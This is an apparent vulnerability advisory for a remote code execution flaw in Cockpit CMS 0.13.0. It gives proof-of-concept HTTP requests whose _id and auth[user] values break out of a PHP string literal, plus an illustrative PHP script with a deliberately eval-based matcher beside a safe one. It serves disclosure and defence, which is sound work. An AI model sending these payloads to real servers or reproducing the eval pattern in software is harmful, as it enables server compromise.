Cockpit CMS 0.13.0 Remote Code Execution

02 Feb 2026 00:00:00 | Reported by Omar Kurt | Type: packetstorm | Source: packetstorm.news

Cockpit CMS 0.13.0 and earlier evaluate attacker-supplied filter values as PHP, allowing unauthenticated remote code execution through several account, authentication and API endpoints.

Cockpit CMS 0.13.0 - Remote Code Execution
    Advisory ID: RO-16-004
    Severity: Critical
    Vendor: Cockpit
    Product: Cockpit CMS
    Version: 0.13.0
    
    
    Overview
    
    Multiple Remote Code Execution (RCE) vulnerabilities exist in Cockpit CMS version 0.13.0. The vulnerabilities allow remote attackers to execute arbitrary PHP code on the server.
    
    
    Vulnerability Details
    
    Affected Versions: 0.13.0 and earlier
    
    Location: Multiple endpoints including /accounts/save, /auth/check, /api/galleries/findOne, /api/collections/findOne
    
    Affected Parameters: account._id, auth[user], filter._id
    
    Root Cause: Values taken from the JSON request body (and from the equivalent form-encoded parameters) are spliced into PHP source that the application then evaluates. A value containing a single quote terminates the surrounding string literal, and the remainder of the value is executed as PHP code.
    
    
    Exploitation Requirements
    
        No authentication required for some vectors
        Direct access to vulnerable endpoints
    
    Impact
    
    Remote attackers can exploit these vulnerabilities to:
    
        Execute arbitrary PHP code on the server
        Gain complete control of the CMS
        Access sensitive files and databases
        Pivot to internal network resources
    
    Proof of Concept
    
    POST /cockpit-0.13.0/accounts/save HTTP/1.1
    Host: target.com
    Content-Type: application/json
    
    {"account":{"_id":"'+print(int)0xFFF9999-22+'"}}
    
    POST /cockpit-0.13.0/auth/check HTTP/1.1
    Host: target.com
    Content-Type: application/x-www-form-urlencoded
    
    auth[user]='+print(int)0xFFF9999-22+'
    
    In both requests the value closes the single-quoted PHP string literal the application wraps around it, appends print((int)0xFFF9999-22) and reopens the literal. If the value is evaluated, the response contains 268409219 (0xFFF9999 minus 22), a marker that proves execution without any side effect on the target; the same value can be supplied as filter._id to the /api/galleries/findOne and /api/collections/findOne endpoints listed above. Note that PHP decodes a literal + in a form-encoded body as a space, so to deliver the second payload exactly as shown, encode each + as %2B.
    
    
    
    Solution
    
    Upgrade to a Cockpit CMS release that fixes this issue (later than 0.13.0). A correct fix treats filter values as data rather than interpolating them into PHP source that is evaluated; character filtering on its own is not a reliable defence for code that is passed to eval.
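As an added illustration of the root cause described under Vulnerability Details and of what the fix has to change, the following PHP script (written for this page; it is not Cockpit's code, and the function names, field name and sample documents are hypothetical) reconstructs the pattern: a filter value pasted into PHP source that is then eval'd, beside a matcher that keeps the value as data. It applies the advisory's own payload, a concatenation variant of it, and a benign lookup to both matchers and reports how many documents matched, what the injected code printed, and any error raised.

```php
<?php
declare(strict_types=1);

// Added example, not Cockpit's code: a reconstruction of the pattern the
// advisory describes (a request value spliced into PHP source that is then
// eval'd) beside a matcher that keeps the value as data. Function names,
// field names and the sample documents are hypothetical.

// VULNERABLE: the filter value is pasted into a single-quoted PHP string
// literal and the generated source is evaluated. A value containing a
// single quote ends the literal; whatever follows is executed as PHP.
function vulnerableMatcher(string $field, string $wanted): Closure
{
    $src = 'return function (array $doc) { return isset($doc["' . $field . '"])'
         . ' && $doc["' . $field . '"] == \'' . $wanted . '\'; };';
    return eval($src);
}

// HARDENED: no source generation at all. The value is captured by the
// closure and compared as data, so quotes and operators have no meaning.
function safeMatcher(string $field, string $wanted): Closure
{
    return static function (array $doc) use ($field, $wanted): bool {
        return isset($doc[$field]) && (string) $doc[$field] === $wanted;
    };
}

// Run one matcher over the documents, capturing anything the (possibly
// injected) code prints and any error it raises.
function runMatcher(callable $factory, string $field, string $value, array $docs): array
{
    $result = ['matches' => 0, 'output' => '', 'error' => null];
    ob_start();
    try {
        $matcher = $factory($field, $value);
        $result['matches'] = count(array_filter($docs, $matcher));
    } catch (Throwable $e) {
        $result['error'] = get_class($e) . ': ' . $e->getMessage();
    } finally {
        $result['output'] = (string) ob_get_clean();
    }
    return $result;
}

// Constructed sample documents.
$docs = [
    ['_id' => 'alice', 'name' => 'Alice'],
    ['_id' => 'bob',   'name' => 'Bob'],
];

// The marker the advisory's payload prints is 0xFFF9999 - 22 = 268409219.
// The first payload is the advisory's own; its trailing +'' is PHP 5-era
// string arithmetic that PHP 8 rejects with a TypeError before print runs,
// so a string-concatenation variant carrying the same marker is included.
$payloads = [
    'advisory payload'      => "'+print(int)0xFFF9999-22+'",
    'concatenation variant' => "'.print((int)0xFFF9999-22).'",
    'benign lookup'         => 'bob',
];

foreach (['vulnerableMatcher', 'safeMatcher'] as $factory) {
    foreach ($payloads as $label => $value) {
        $r = runMatcher($factory, '_id', $value, $docs);
        printf("%-17s %-22s matches=%d output=%s error=%s\n",
            $factory, $label, $r['matches'],
            $r['output'] === '' ? '(none)' : var_export($r['output'], true),
            $r['error'] ?? '(none)');
    }
}
```

Against vulnerableMatcher the injected print runs once per document, so the marker 268409219 appears in the captured output (on PHP 7.1 and later the advisory's payload also emits "A non-numeric value encountered" warnings; on PHP 8 it raises a TypeError instead, while the concatenation variant prints the marker on every version). Against safeMatcher the same strings are just unmatched identifiers: zero matches, no output, no error, and the benign lookup still finds bob. The difference is not escaping quality but the absence of code generation, which is the property the fix needs.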
    
    
    References
    
        Invicti Advisory NS-16-016
    
    Timeline:
    
        [2016-06-30] - Reported
        [2016-09-19] - Advisory released
    
    Credits: Omar Kurt
